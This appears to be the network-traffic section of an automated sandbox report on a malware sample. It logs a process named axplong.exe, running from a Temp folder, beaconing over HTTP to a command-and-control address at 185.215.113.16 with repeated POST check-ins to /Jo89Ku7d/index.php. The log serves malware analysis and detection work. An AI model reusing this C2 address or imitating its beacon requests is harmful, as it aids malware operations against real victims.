                    Sep 27, 2024 03:07:21.355112076 CEST8056642185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:21.579701900 CEST8056642185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:21.579799891 CEST5664280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:21.692971945 CEST5664280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:21.693309069 CEST5664480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:21.698163986 CEST8056644185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:21.698185921 CEST8056642185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:21.698280096 CEST5664480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:21.698323011 CEST5664280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:21.698478937 CEST5664480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:21.703205109 CEST8056644185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:22.420396090 CEST8056644185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:22.420542955 CEST5664480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:22.421452045 CEST5664480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:22.426289082 CEST8056644185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:22.650329113 CEST8056644185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:22.650578022 CEST5664480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:22.755407095 CEST5664480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:22.755690098 CEST5664580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:22.761603117 CEST8056644185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:22.761672974 CEST8056645185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:22.761749983 CEST5664580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:22.761904001 CEST5664580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:22.761966944 CEST5664480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:22.767997026 CEST8056645185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:23.454515934 CEST8056645185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:23.454665899 CEST5664580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:23.455425024 CEST5664580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:23.461146116 CEST8056645185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:23.678189039 CEST8056645185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:23.678242922 CEST5664580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:23.786567926 CEST5664580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:23.787005901 CEST5664680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:23.791918039 CEST8056646185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:23.792040110 CEST5664680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:23.792267084 CEST5664680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:23.792334080 CEST8056645185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:23.792401075 CEST5664580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:23.797058105 CEST8056646185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:24.494514942 CEST8056646185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:24.494677067 CEST5664680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:24.495553017 CEST5664680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:24.502003908 CEST8056646185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:24.722302914 CEST8056646185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:24.722470999 CEST5664680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:24.833220005 CEST5664680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:24.833676100 CEST5664780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:24.848588943 CEST8056647185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:24.848633051 CEST8056646185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:24.848661900 CEST5664780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:24.848696947 CEST5664680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:24.848995924 CEST5664780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:24.856358051 CEST8056647185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:25.541349888 CEST8056647185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:25.541485071 CEST5664780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:25.542232990 CEST5664780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:25.547111034 CEST8056647185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:25.763559103 CEST8056647185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:25.763714075 CEST5664780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:25.895950079 CEST5664780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:25.896326065 CEST5664880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:25.901211977 CEST8056647185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:25.901226997 CEST8056648185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:25.901304007 CEST5664780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:25.901335955 CEST5664880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:25.901458979 CEST5664880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:25.907679081 CEST8056648185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:26.600758076 CEST8056648185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:26.600831985 CEST5664880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:26.601505995 CEST5664880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:26.606255054 CEST8056648185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:26.828299999 CEST8056648185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:26.828406096 CEST5664880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:26.942786932 CEST5664880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:26.943134069 CEST5664980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:26.947856903 CEST8056648185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:26.947951078 CEST8056649185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:26.947957993 CEST5664880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:26.948039055 CEST5664980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:26.948230982 CEST5664980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:26.953006983 CEST8056649185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:27.656364918 CEST8056649185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:27.656599045 CEST5664980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:27.657565117 CEST5664980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:27.662326097 CEST8056649185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:27.884694099 CEST8056649185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:27.884757042 CEST5664980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:27.991689920 CEST5664980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:27.992011070 CEST5665080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:27.996690035 CEST8056649185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:27.996764898 CEST5664980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:27.996885061 CEST8056650185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:27.996944904 CEST5665080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:27.997077942 CEST5665080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:28.001976013 CEST8056650185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:28.705816984 CEST8056650185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:28.705918074 CEST5665080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:28.706840992 CEST5665080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:28.711623907 CEST8056650185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:28.935754061 CEST8056650185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:28.935894966 CEST5665080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:29.052057981 CEST5665080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:29.052392960 CEST5665180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:29.057260990 CEST8056650185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:29.057295084 CEST8056651185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:29.057358027 CEST5665080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:29.057435036 CEST5665180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:29.057605028 CEST5665180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:29.062669992 CEST8056651185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:29.780584097 CEST8056651185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:29.780703068 CEST5665180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:29.781574965 CEST5665180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:29.786416054 CEST8056651185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:30.012847900 CEST8056651185.215.113.16192.168.2.6
                    Sep 27, 2024 03:07:30.012950897 CEST5665180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:30.114545107 CEST5665180192.168.2.6185.215.113.16
                    Sep 27, 2024 03:07:30.114768982 CEST5665280192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.307516098 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:02.307537079 CEST8056683185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:02.307666063 CEST5668380192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.307739973 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.307837009 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:02.312580109 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.035101891 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.035249949 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.056969881 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.061913013 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.283761978 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.283879995 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.413615942 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.413986921 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.418869972 CEST8056685185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.418955088 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.419090986 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.419506073 CEST8056684185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:03.419564962 CEST5668480192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:03.424348116 CEST8056685185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:04.127178907 CEST8056685185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:04.127247095 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.130686998 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.131156921 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.135885000 CEST8056685185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:04.135960102 CEST5668580192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.136367083 CEST8056686185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:04.136487007 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.136584997 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:04.141526937 CEST8056686185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.043207884 CEST8056686185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.043282986 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.148562908 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.148853064 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.154048920 CEST8056686185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.154066086 CEST8056687185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.154160023 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.154171944 CEST5668680192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.156019926 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.160867929 CEST8056687185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.853718042 CEST8056687185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.854988098 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.909229994 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.913491011 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.915788889 CEST8056687185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.916101933 CEST5668780192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.919895887 CEST8056688185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:05.920171022 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.921688080 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:05.927639008 CEST8056688185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:06.695524931 CEST8056688185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:06.695760965 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.804389000 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.804588079 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.809396029 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:06.809510946 CEST8056688185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:06.809602976 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.809672117 CEST5668880192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.809837103 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:06.814640999 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:07.508126974 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:07.508198023 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:07.514189959 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:07.521642923 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:07.740587950 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:07.743762016 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:07.885380983 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:07.885734081 CEST5669080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:08.016164064 CEST8056690185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:08.016232967 CEST5669080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:08.016239882 CEST8056689185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:08.016321898 CEST5668980192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:08.016844988 CEST5669080192.168.2.6185.215.113.16
                    Sep 27, 2024 03:08:08.021625042 CEST8056690185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:08.741755962 CEST8056690185.215.113.16192.168.2.6
                    Sep 27, 2024 03:08:08.742222071 CEST5669080192.168.2.6185.215.113.16
                    Timestamp  Source Port  Dest Port  Source IP  Dest IP
                    Sep 27, 2024 03:06:21.885983944 CEST  53  49363  1.1.1.1  192.168.2.6
                    Sep 27, 2024 03:06:48.574023962 CEST  53  58522  162.159.36.2  192.168.2.6
                    Sep 27, 2024 03:06:49.067341089 CEST  53  61793  1.1.1.1  192.168.2.6
                    • 185.215.113.16
                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                    0  192.168.2.6  56623  185.215.113.16  80  4932  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp  Bytes transferred  Direction  Data
                    Sep 27, 2024 03:07:02.607655048 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:03.316940069 CEST  219  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:03.331706047 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:03.554655075 CEST  196  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:03 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                    1  192.168.2.6  56624  185.215.113.16  80  4932  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp  Bytes transferred  Direction  Data
                    Sep 27, 2024 03:07:03.667393923 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:04.358390093 CEST  219  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:04.359389067 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:04.581516981 CEST  196  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                    2  192.168.2.6  56625  185.215.113.16  80  4932  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp  Bytes transferred  Direction  Data
                    Sep 27, 2024 03:07:04.699923992 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:05.412720919 CEST  219  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:05.413649082 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:05.823570013 CEST  196  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                    3  192.168.2.6  56627  185.215.113.16  80  4932  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp  Bytes transferred  Direction  Data
                    Sep 27, 2024 03:07:05.948107958 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:06.646378040 CEST  219  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:06.647269964 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:06.869190931 CEST  196  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                    4  192.168.2.6  56628  185.215.113.16  80  4932  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    Timestamp  Bytes transferred  Direction  Data
                    Sep 27, 2024 03:07:06.995167017 CEST  156  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:07.692848921 CEST  219  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:07.693691015 CEST  314  OUT  POST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:07.919451952 CEST  196  IN  HTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                    5  192.168.2.6  56629  185.215.113.16  80  4932  C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
